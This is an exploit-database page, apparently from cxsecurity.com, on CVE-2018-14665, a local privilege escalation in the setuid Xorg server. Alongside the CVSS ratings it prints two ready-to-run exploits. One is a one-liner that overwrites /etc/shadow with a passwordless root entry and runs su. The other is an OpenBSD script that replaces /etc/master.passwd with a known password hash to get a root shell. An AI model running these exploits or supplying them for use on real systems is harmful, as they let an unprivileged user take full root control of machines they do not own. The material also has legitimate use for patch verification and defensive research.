xorg-x11-server Local Privilege Escalation

2018.10.29
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. #!/bin/sh # local privilege escalation in X11 currently # unpatched in OpenBSD 6.4 stable - exploit # uses cve-2018-14665 to overwrite files as root. # Impacts Xorg 1.19.0 - 1.20.2 which ships setuid # and vulnerable in default OpenBSD. # # - https://hacker.house echo [+] OpenBSD 6.4-stable local root exploit cd /etc Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 & sleep 5 pkill Xorg echo [-] dont forget to mv and chmod /etc/master.passwd.old back echo [+] type 'Password1' and hit enter for root su -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top